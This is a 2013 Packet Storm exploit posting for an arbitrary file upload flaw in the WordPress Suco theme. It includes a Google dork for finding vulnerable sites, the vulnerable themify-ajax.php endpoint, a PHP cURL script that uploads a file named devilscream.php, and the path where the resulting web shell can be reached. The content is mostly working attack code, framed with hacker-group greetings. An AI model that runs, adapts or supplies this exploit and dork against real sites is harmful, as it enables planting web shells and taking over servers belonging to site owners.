WordPress Suco Shell Upload

2013-11-20T00:00:00
ID PACKETSTORM:124094
Type packetstorm
Reporter DevilScreaM
Modified 2013-11-20T00:00:00

Description

                                        
                                            `#Title : Wordpress Suco Themes Arbitrary File Upload   
  
#Author : DevilScreaM  
  
#Date : 11/20/2013 - 20 November 2013  
  
#Category : Web Applications  
  
#Type : PHP  
  
#Vendor : http://themify.me/  
  
#Link : http://themify.me/themes/suco  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozila, Chrome, Opera -> Windows & Linux  
  
#Vulnerabillity : Arbitrary File Upload  
  
#Dork :  
  
inurl:wp-content/themes/suco  
  
  
Arbitrary File Upload  
  
Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php  
  
Script :  
  
<?php  
$uploadfile="devilscream.php";  
$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
  
  
Shell Access :  
  
http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php  
`